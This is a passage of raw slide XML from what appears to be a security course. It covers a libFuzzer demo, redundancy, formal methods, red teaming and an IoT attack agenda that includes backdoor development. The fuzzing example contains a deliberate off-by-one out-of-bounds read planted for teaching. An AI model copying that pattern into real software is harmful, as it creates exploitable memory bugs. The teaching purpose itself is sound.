            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bool FuzzMe(const uint8_t *Data, size_t DataSize) {</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#ifdef FIXBUG</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if (DataSize &lt; 4)</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false;</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#endif</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DataSize &gt;= 3 &amp;&amp; Data[0] == 'F' &amp;&amp;</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Data[1] == 'U’ &amp;&amp; Data[2] == 'Z’ &amp;&amp; Data[3] == 'Z’;</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extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {</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if (Size &lt; 4)</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0;</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FuzzMe(Data, Size);</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0;</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"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151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DDB0A4-3742-9F4F-852D-55150A1818E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="5017614"/>
            <a:ext cx="1653017" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From Google</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193CE88F-CFE9-CA47-95F5-F1CFD87DA721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722081" y="1542323"/>
            <a:ext cx="5449330" cy="49229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400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>extern "C" int LLVMFuzzerTestOneInput(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    const uint8_t *Data, size_t Size) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  FuzzMe(Data, Size);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">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Compile and run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clang-6.0 –g –fsanitize=address,fuzzer test_fuzz.cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>./a.out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">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What happens when you define FIXBUG?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">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23574839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Redundancy and failure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1532238"/>
            <a:ext cx="11582400" cy="4824113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Surveillance model and attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Attackers can study deployed systems in detail over a long period of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Homogeneity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>In homogeneous systems a single vulnerability can effect the entire ecosystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Uncorrelated redundancy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Multiple subsystems that provide equivalent function with independent and uncorrelated design, implementation, configuration and operational structure can provide resilience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Don’t go overboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Agility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Because of asymmetry, if you have advanced adversaries, you must have agile systems that can and are changed with moderate frequency.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>With this and well monitored systems, you can catch adversaries quickly even if they succeed maybe bending their cost-reward curve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Make sure your update mechanism is foolproof and well practiced.</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152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39540636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48"/>
            <a:ext cx="12192000" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Formal methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440267" y="1761067"/>
            <a:ext cx="11429999" cy="3675909"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>New formal analysis tools can make small (&lt;10000  LOC) systems relatively hard against modeled attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Employ this for small critical subsystems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Crypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>References: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TLA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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BLAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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Zing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Coq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.</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153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39644274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Red Teaming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778476" y="1767053"/>
            <a:ext cx="10392031"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Current state of the art for determining just how safe a system is but it depends on having an expensive, talented team attacking all the time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Levels of assumed access:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Insider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Physical possession</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Trusted insiders can be a big problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Need to persistently look for attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Automated analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Maybe the red team should be a program that runs all the time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154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8236716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11691"/>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9, IoT software and attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619432" y="1856509"/>
            <a:ext cx="11112910" cy="4833435"/>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What’s special about IoT</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Physical access</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Side channels: Spectre, differential power, differential timing</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Glitching</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Special IoT protocols</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Trusted computing primitives for IoT</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Update</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JTAG and UART</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Tools of the trade</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Firmware modification and upload</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Simulation and reverse engineering</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Developing backdoors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Preventing and mitigating attacks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155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152726335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What’s special about IoT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741405" y="2065866"/>
            <a:ext cx="10540314" cy="4070351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most IoT device do NOT employ defensive technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most IoT software is at least one or two years out of date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most IoT firmware is not updated or is updated insecurely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You often have physical access to IoT interfaces: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Example: You can connect to UART or JTAG interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
